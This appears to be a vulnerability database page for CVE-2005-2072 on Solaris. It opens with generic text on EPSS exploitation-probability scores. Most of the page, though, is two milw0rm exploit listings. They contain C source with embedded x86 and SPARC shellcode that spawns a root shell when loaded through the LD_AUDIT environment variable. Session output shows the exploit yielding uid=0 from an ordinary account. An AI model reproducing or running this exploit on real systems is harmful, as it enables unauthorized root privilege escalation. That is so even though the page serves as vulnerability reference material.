CVE-2005-2072 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* - SunOS 5.10 Generic i86pc i386 i86pc - SunOS 5.9 Generic_112233-12 sun4u It does NOT work on: SunOS 5.8 Generic_117350-02 sun4u sparc Example on unpatched Solaris 10 (AMD64): atari:venglin:~> cat dupa.c */ static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } /* atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so atari:venglin:~> su # id uid=0(root) gid=10(staff) */ // milw0rm.com [2005-06-28]

/* Solaris 9 on SPARC: $ cat dupa.c */ char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } /* $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c $ export LD_AUDIT=/tmp/dupa.so $ ping # id uid=0(root) gid=100(student) */ // milw0rm.com [2005-06-28]